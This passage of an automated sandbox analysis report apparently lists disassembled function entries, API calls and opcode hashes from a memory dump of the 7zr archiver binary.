                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: b7abf60b2877a388fb13058a127b83bbb76c92b379f0d2d1a7245a823857fe7d
                        • Instruction ID: 4b4ebe2c6d051452e8b8c584d8a40593bcd6accf39288aaddc221f1d9df2e876
                        • Opcode Fuzzy Hash: b7abf60b2877a388fb13058a127b83bbb76c92b379f0d2d1a7245a823857fe7d
                        • Instruction Fuzzy Hash: 3841D270A00B4ADFDB26CF64C498F6ABBA0BF04318F158A6DD456C7A91C370ED81CB81
                        APIs
                        • __EH_prolog.LIBCMT ref: 00394255
                          • Part of subcall function 0039440B: __EH_prolog.LIBCMT ref: 00394410
                          • Part of subcall function 00381E0C: malloc.MSVCRT ref: 00381E1F
                          • Part of subcall function 00381E0C: _CxxThrowException.MSVCRT(?,00434B28), ref: 00381E39
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ExceptionThrowmalloc
                        • String ID:
                        • API String ID: 3744649731-0
                        • Opcode ID: dd00aa67af5dceee11e82a147e8124bc78e0ec30be46f18191450558712cc19e
                        • Instruction ID: efe37403f48419a8f10d0dfbaf57e2105c5fcaa7c7b9c2f03fa60819c6c729d7
                        • Opcode Fuzzy Hash: dd00aa67af5dceee11e82a147e8124bc78e0ec30be46f18191450558712cc19e
                        • Instruction Fuzzy Hash: 6751F8B0901744CFC726DF69C1846DAFBF0BF19304F9488AEC49A9B752D7B4A608CB65
                        APIs
                        • __EH_prolog.LIBCMT ref: 003AD0E6
                          • Part of subcall function 00381E0C: malloc.MSVCRT ref: 00381E1F
                          • Part of subcall function 00381E0C: _CxxThrowException.MSVCRT(?,00434B28), ref: 00381E39
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionH_prologThrowmalloc
                        • String ID:
                        • API String ID: 3978722251-0
                        • Opcode ID: 6eefdc62734295b74895b99ba4d09caeb0c294bb90793f025b604d5e419879cc
                        • Instruction ID: ce0f017e66878d9e644429ba9a040646a56a01eea57e585272a69a1badd682a6
                        • Opcode Fuzzy Hash: 6eefdc62734295b74895b99ba4d09caeb0c294bb90793f025b604d5e419879cc
                        • Instruction Fuzzy Hash: 7341B471A002159FCB16DBA8C8457AEBBB8FF46310F254499E446EB682CB709D05C790
                        APIs
                        • __EH_prolog.LIBCMT ref: 00397FCA
                          • Part of subcall function 0038950D: SysAllocStringLen.OLEAUT32(?,?), ref: 0038952C
                          • Part of subcall function 0038950D: _CxxThrowException.MSVCRT(?,004355B8), ref: 0038954A
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AllocExceptionH_prologStringThrow
                        • String ID:
                        • API String ID: 1940201546-0
                        • Opcode ID: 2350d7aecb7995f244e7799afb5acee05e054b24be0c73a9b990ca9b2012dda4
                        • Instruction ID: 46445161bdac968d87283d8b2b4d20f4489357cff5ed5b55493cfec2f554391e
                        • Opcode Fuzzy Hash: 2350d7aecb7995f244e7799afb5acee05e054b24be0c73a9b990ca9b2012dda4
                        • Instruction Fuzzy Hash: FB31C372820209EADF17AFA4C8559FE7774FF96310F45406AE002B7761EF359A08D751
                        APIs
                        • __EH_prolog.LIBCMT ref: 003BADBC
                          • Part of subcall function 003BAD29: __EH_prolog.LIBCMT ref: 003BAD2E
                          • Part of subcall function 003BAF2D: __EH_prolog.LIBCMT ref: 003BAF32
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: e7114936a0dae67d215f7521308692c8b97c1fdc314f7ef0b44a7bdeacf832ce
                        • Instruction ID: 970f2ee490f15b63f6eb973c1063f7291cf5f5387f8e9b8a04858ef29765640e
                        • Opcode Fuzzy Hash: e7114936a0dae67d215f7521308692c8b97c1fdc314f7ef0b44a7bdeacf832ce
                        • Instruction Fuzzy Hash: 8941C97144ABC0DEC326DF7881656CAFFE06F25204F94C99EC0EA47A52D670A60CC76A
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 2322b3a80572976a123368ed9e2683c1bef1f9635b220edb896620fb5c232fc6
                        • Instruction ID: 46ea288c082f892f395e015dc7ca9c5f44f4ecbbd24a889c02c7cac400393826
                        • Opcode Fuzzy Hash: 2322b3a80572976a123368ed9e2683c1bef1f9635b220edb896620fb5c232fc6
                        • Instruction Fuzzy Hash: 6B312174D00209DFCB19EF95C9918EEFBB9FF96364B10811EE4266B651C7309D51CBA0
                        APIs
                        • __EH_prolog.LIBCMT ref: 003A98F7
                          • Part of subcall function 003A9987: __EH_prolog.LIBCMT ref: 003A998C
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 8816aeb79269a61bfb95d9001f207ab2dc8246de4823f61e61863640967122d3
                        • Instruction ID: f5caec88631c043eafae3a3d703f5142f8b4fcb83855df6efa26800d6af5a7d1
                        • Opcode Fuzzy Hash: 8816aeb79269a61bfb95d9001f207ab2dc8246de4823f61e61863640967122d3
                        • Instruction Fuzzy Hash: DF117C35700205AFCB14CF59C884BABB3A9FF8A350F15855DE956EB251CB35EC00CB10
                        APIs
                        • __EH_prolog.LIBCMT ref: 003A021F
                          • Part of subcall function 00393D66: __EH_prolog.LIBCMT ref: 00393D6B
                          • Part of subcall function 00393D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393D7D
                          • Part of subcall function 00393D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393D94
                          • Part of subcall function 00393D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00393DB6
                          • Part of subcall function 00393D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393DCB
                          • Part of subcall function 00393D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393DD5
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                        • String ID:
                        • API String ID: 1532160333-0
                        • Opcode ID: 9d4ce7651281f6fcd7b28ebabc8585b10ac3d9a0c9e92c5aa7272db7d48da867
                        • Instruction ID: 1e53a6769ca8fc08c74d823c0d4308e6bd182330b9ce25678c5e0b9f9a7b7c81
                        • Opcode Fuzzy Hash: 9d4ce7651281f6fcd7b28ebabc8585b10ac3d9a0c9e92c5aa7272db7d48da867
                        • Instruction Fuzzy Hash: 8D2139B1946B90CFC321DF6A82D0686FFF4BB19604B94996FC0DA83B12C374A548CF55
                        APIs
                        • __EH_prolog.LIBCMT ref: 003A1C74
                          • Part of subcall function 00386C72: __EH_prolog.LIBCMT ref: 00386C77
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: c437956e4333ad7976f060d95f1868441288eae999e0df882ab6cd73fc291f97
                        • Instruction ID: 663b742bb9299d5ea77b45c87421768fec7c14ab98627b503f957e4302c6fd5d
                        • Opcode Fuzzy Hash: c437956e4333ad7976f060d95f1868441288eae999e0df882ab6cd73fc291f97
                        • Instruction Fuzzy Hash: 7A11AD31A003049BCF1BFBE4D952BEEBB79EF05364F0000A9E8426B192DB656D4AC794
                        APIs
                        • __EH_prolog.LIBCMT ref: 00397E5F
                          • Part of subcall function 00386C72: __EH_prolog.LIBCMT ref: 00386C77
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                          • Part of subcall function 0038757D: GetLastError.KERNEL32(0038D14C), ref: 0038757D
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ErrorLastfree
                        • String ID:
                        • API String ID: 683690243-0
                        • Opcode ID: 0567ce7bea20021aec84b1a20ebc0127d00c596e17cc4547800d68202dc38696
                        • Instruction ID: 5dec496188139c52a957934c88534a7f5c0b9834ace7d314002f62d77b9b9c7d
                        • Opcode Fuzzy Hash: 0567ce7bea20021aec84b1a20ebc0127d00c596e17cc4547800d68202dc38696
                        • Instruction Fuzzy Hash: B701A572A457009FC722FF74D4929DB7BB5EF45350B10456EE84357592CB346909CB50
                        APIs
                        • __EH_prolog.LIBCMT ref: 003CBF91
                          • Part of subcall function 003CD144: __EH_prolog.LIBCMT ref: 003CD149
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$free
                        • String ID:
                        • API String ID: 2654054672-0
                        • Opcode ID: 9f19e17210a88e8148782ff526c902022d099ff6ae7f7062945ed714fe648fbf
                        • Instruction ID: 4f22295769166842f122e79c5b13951ea9ea9b660a0ba1d79d95ba85cdc6c1a6
                        • Opcode Fuzzy Hash: 9f19e17210a88e8148782ff526c902022d099ff6ae7f7062945ed714fe648fbf
                        • Instruction Fuzzy Hash: D6117070510B14DFCB25EF64D905BCABBF4BF04344F008A6DE4AA975A2DBB4BA04DB84
                        APIs
                        • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,00381AD1,00000000,00000002,00000002,?,00387B3E,?,00000000), ref: 00387AFD
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: FileTime
                        • String ID:
                        • API String ID: 1425588814-0
                        • Opcode ID: e567c290a91d3a36bb02767a3a3f78168fbfbda0d2e3a4b69f6296abd1c502a4
                        • Instruction ID: 1da9939eb1457f3e2acb212609929febd85a3d65c0aa51d3f9812a5e0dc8736f
                        • Opcode Fuzzy Hash: e567c290a91d3a36bb02767a3a3f78168fbfbda0d2e3a4b69f6296abd1c502a4
                        • Instruction Fuzzy Hash: F9018F30108348BFDF27AF54CC05BEE3FA69B05320F248189B9A5562E1C760DE61D750
                        APIs
                        • __EH_prolog.LIBCMT ref: 003BC0B8
                          • Part of subcall function 003A7193: __EH_prolog.LIBCMT ref: 003A7198
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$free
                        • String ID:
                        • API String ID: 2654054672-0
                        • Opcode ID: 9abee6cd3670a45c4f665999fc997b9cdecf33817aecf92302034a146ee09ffe
                        • Instruction ID: 3f980b6eeec4a77057678aa2a6d50d451d70ab25266556b1bdbf38df947e1ca4
                        • Opcode Fuzzy Hash: 9abee6cd3670a45c4f665999fc997b9cdecf33817aecf92302034a146ee09ffe
                        • Instruction Fuzzy Hash: A8F02432A04712DBD723AB49E8817EEF3ACEF14324F11002FE5029BA02CBB5EC018684
                        APIs
                        • __EH_prolog.LIBCMT ref: 003C0364
                          • Part of subcall function 003C01C4: __EH_prolog.LIBCMT ref: 003C01C9
                          • Part of subcall function 003C0143: __EH_prolog.LIBCMT ref: 003C0148
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                          • Part of subcall function 003C03D8: __EH_prolog.LIBCMT ref: 003C03DD
                          • Part of subcall function 003C004A: __EH_prolog.LIBCMT ref: 003C004F
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$free
                        • String ID:
                        • API String ID: 2654054672-0
                        • Opcode ID: 44d4e7f3acfdc8f1ca479163c1ea9f76f99b0dda9bbff28d23e4fc5b063e7008
                        • Instruction ID: ae4267d43d7cf6c514d63519efcdcff71d796082167458f7706a571e96bac897
                        • Opcode Fuzzy Hash: 44d4e7f3acfdc8f1ca479163c1ea9f76f99b0dda9bbff28d23e4fc5b063e7008
                        • Instruction Fuzzy Hash: C1F0F430918B90DBCB1FFBA8D42279DBBE4AF04314F10469DE452A72D2CBB86F048748
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 20515f79cfe69aa4de31592753b0796034f4dc88fb7985420e04657358a3109d
                        • Instruction ID: 497bf85f9fb1e6e7f735bc85033380fc30636c91c90f4affa63d5e94ff4be2f2
                        • Opcode Fuzzy Hash: 20515f79cfe69aa4de31592753b0796034f4dc88fb7985420e04657358a3109d
                        • Instruction Fuzzy Hash: F0F0C232E0011AEBCB11EF98D8409EFBB78FF44754B10805BF515E7650CB348A05CB94
                        APIs
                        • __EH_prolog.LIBCMT ref: 003C550A
                          • Part of subcall function 003C4E8A: __EH_prolog.LIBCMT ref: 003C4E8F
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: fbef85981d910581aa4ddcea8053da50fd34adbb7f5398f2bceda610ec66f8fa
                        • Instruction ID: d57032ddde366f891f8d46e43d91a71e130efac2999f8172917d92b3c9e38c23
                        • Opcode Fuzzy Hash: fbef85981d910581aa4ddcea8053da50fd34adbb7f5398f2bceda610ec66f8fa
                        • Instruction Fuzzy Hash: 41F06D76604914EBCB029F48E811FDE7BBAFF85364F11842EF80697241DB75ED018BA0
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: d3a4150437ddaaacbfd94c9e7285997a101d6a39cb0019ff688a3fa1c9ff6799
                        • Instruction ID: 40bbba650914e2461c028b1dc662d82ba2a2f75fc53edf1473befbbf83e4e9ff
                        • Opcode Fuzzy Hash: d3a4150437ddaaacbfd94c9e7285997a101d6a39cb0019ff688a3fa1c9ff6799
                        • Instruction Fuzzy Hash: 96E06D71604208AFC704EF98E855F9EB7A8EF49354F10841EB00A97205C734A900CA64
                        APIs
                        • __EH_prolog.LIBCMT ref: 003C5E30
                          • Part of subcall function 003C08B6: __aulldiv.LIBCMT ref: 003C093F
                          • Part of subcall function 0039DFC9: __EH_prolog.LIBCMT ref: 0039DFCE
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$__aulldiv
                        • String ID:
                        • API String ID: 604474441-0
                        • Opcode ID: 90de2d87f3b9d239cb97b0532c4112b054f3865c055703f7699ec823ca9d063e
                        • Instruction ID: 23c3adf973ecb922cd42a018af41f60a419763d102d958887076cdfbbb3a0b6c
                        • Opcode Fuzzy Hash: 90de2d87f3b9d239cb97b0532c4112b054f3865c055703f7699ec823ca9d063e
                        • Instruction Fuzzy Hash: 71E03970A01760DFCB56EFB8A54168EB6E4BB08700F00886FA046D7B41DBB4A9008B80
                        APIs
                        • __EH_prolog.LIBCMT ref: 003C8ED6
                          • Part of subcall function 003C9267: __EH_prolog.LIBCMT ref: 003C926C
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 0f144d27fd19e6d0f640dc1b50e0a1c530746996b7798d0fb58f2b5d92fcc8fb
                        • Instruction ID: e95e89ef132a68936d215d67c519fdd0d094c8a159714c36c0d2810605043247
                        • Opcode Fuzzy Hash: 0f144d27fd19e6d0f640dc1b50e0a1c530746996b7798d0fb58f2b5d92fcc8fb
                        • Instruction Fuzzy Hash: 61E0D871A14934DAC71EEB64E522BDDB7A8EF04708F000A5EA04393582CFB87B04C785
                        APIs
                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00387C8B
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: FileWrite
                        • String ID:
                        • API String ID: 3934441357-0
                        • Opcode ID: 93deed89a5229f80e47490fab75869c913d4d60110b19056e3e2e9cb61356480
                        • Instruction ID: 5e8c80b9834cc12ad1bdf69b6ac20dcddf7b8b5ad47f99d701394ed3f9bd2264
                        • Opcode Fuzzy Hash: 93deed89a5229f80e47490fab75869c913d4d60110b19056e3e2e9cb61356480
                        • Instruction Fuzzy Hash: 97E01A75600209FBCF11CFA5D801BCE7BB9EB09754F20C06AF9199A260D739DA50DF54
                        APIs
                        • __EH_prolog.LIBCMT ref: 003CBE6E
                          • Part of subcall function 003C5E2B: __EH_prolog.LIBCMT ref: 003C5E30
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
